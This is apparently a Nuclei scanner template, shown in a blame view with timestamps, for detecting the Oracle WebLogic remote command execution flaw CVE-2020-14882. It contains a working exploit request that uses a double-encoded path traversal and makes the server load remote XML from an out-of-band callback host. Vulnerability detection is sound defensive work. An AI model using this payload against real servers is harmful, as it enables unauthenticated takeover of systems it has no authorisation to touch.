2021-01-02 04:56:15 +00:00
id : CVE-2020-14882
2020-11-02 07:23:12 +00:00
info :
2022-04-29 19:58:07 +00:00
name : Oracle Weblogic Server - Remote Command Execution
2020-11-02 07:23:12 +00:00
author : dwisiswant0
severity : critical
2022-04-29 19:58:07 +00:00
description : Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.
2021-08-18 11:37:49 +00:00
reference :
2021-03-11 15:26:35 +00:00
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
2022-02-04 19:29:39 +00:00
- https://www.oracle.com/security-alerts/cpuoct2020.html
2021-03-11 15:26:35 +00:00
- https://twitter.com/jas502n/status/1321416053050667009
- https://youtu.be/JFVDOIL0YtA
- https://github.com/jas502n/CVE-2020-14882#eg
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-14882
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-14882
2023-07-11 19:49:27 +00:00
epss-score : 0.97544
cpe : cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : oracle
product : weblogic_server
tags : cve,cve2020,oracle,rce,weblogic,oast,kev
2020-11-02 07:23:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-09 14:52:22 +00:00
- method : GET
path :
- "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"
2021-08-22 18:09:33 +00:00
2020-11-02 07:23:12 +00:00
matchers-condition : and
matchers :
2021-11-28 19:45:05 +00:00
- type : word
part : header
words :
- "ADMINCONSOLESESSION"
2021-09-12 14:52:03 +00:00
2021-11-28 19:45:05 +00:00
- type : word
part : interactsh_protocol
words :
2022-02-04 19:29:39 +00:00
- "http"